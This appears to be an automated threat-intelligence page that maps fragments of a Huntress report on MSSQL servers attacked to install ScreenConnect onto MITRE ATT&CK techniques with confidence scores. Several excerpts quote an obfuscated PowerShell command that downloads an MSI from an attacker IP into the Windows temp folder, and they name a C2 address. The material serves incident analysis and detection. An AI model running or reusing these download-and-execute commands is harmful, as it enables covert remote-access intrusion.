“timing and sequence of commands appearing on multiple endpoints, across different customer infrastructures, appears to indicate a script or playbook was being followed, possibly in an automated fashion. Indicator 185.56.83[.]82 - initial “C2” IP address (target for finger…”
T1059.001 PowerShell (89%)
“Again, it should be noted that prior to this command, there were no visible commands that would have led to the file 1.msi being downloaded to the endpoints. On both endpoints, the above command line was immediately followed in the investigative timeline with MsiInstaller re…”
T1059.001 PowerShell (77%)
“.exe, following the successful exploit of the OWASSRF vulnerability. Approximately 100 minutes later, on both endpoints, two commands encoded by converting each character to its decimal equivalent, separated by “+”, were visible in EDR telemetry. An excerpt of the command line…”
T1059.001 PowerShell (72%)
“= 'd' + 'own' + 'loa' + 'dfi' + 'le'; invoke-expression (new-object net.webclient).$ds.invoke(''http://95.179.241[.]10:23963/bin/connectwisecontrol.clientsetup.msi?e=access&y=guest'', ''c:\windows\temp\2.msi'') power…”
T1059.001 PowerShell (70%)
“as follows: "c:\windows\system32\cmd.exe" /c powershell -nop -c $ds = 'd' + 'own' + 'loa'' + 'dfi' + 'le'; invoke-expression (new-object net.webclient).$ds.invoke('http://95.179.241[.]10:23963/bin/connectwisecontrol.clientse…”
T1218.007 Msiexec (55%)
“as follows: "c:\windows\system32\cmd.exe" /c powershell -nop -c $ds = 'd' + 'own' + 'loa'' + 'dfi' + 'le'; invoke-expression (new-object net.webclient).$ds.invoke('http://95.179.241[.]10:23963/bin/connectwisecontrol.clientse…”
T1059 Command and Scripting Interpreter (50%)
“timing and sequence of commands appearing on multiple endpoints, across different customer infrastructures, appears to indicate a script or playbook was being followed, possibly in an automated fashion. Indicator 185.56.83[.]82 - initial “C2” IP address (target for finger…”
T1218.007 Msiexec (49%)
“.msi and determined that the ScreenConnect instance ID tied to the installer is f722dcd0838a377e, and that it connects to 95.179.241[.]10. There were no indications that the ScreenConnect instance was successfully installed on any of the monitored endpoints. Reviewing the i…”
T1190 Exploit Public-Facing Application (39%)
“timing and sequence of commands appearing on multiple endpoints, across different customer infrastructures, appears to indicate a script or playbook was being followed, possibly in an automated fashion. Indicator 185.56.83[.]82 - initial “C2” IP address (target for finger…”
T1059.003 Windows Command Shell (35%)
“MSSQL to ScreenConnect | Huntress. Background. Huntress SOC analysts continue to see alerts indicating malicious activity on endpoints running MSSQL Server or MSSQL Express, either as stand-alone installations, or as part of a larger application package installation. A recent ser…”
T1048 Exfiltration Over Alternative Protocol (31%)
“The commands involved in the attack were similar, and appeared to be automated in nature. The first indication of the attack was an MSSQL event ID 15281 record within the Application event log, indicating that access to a stored procedure was blocked, as illustrated in Figure 2. …”
Summary
Huntress continues to see MSSQL server systems being attacked, and in recent incidents has seen overlap with previous incidents, not only in the use of LOLBins but also in the IP addresses used by the threat actor.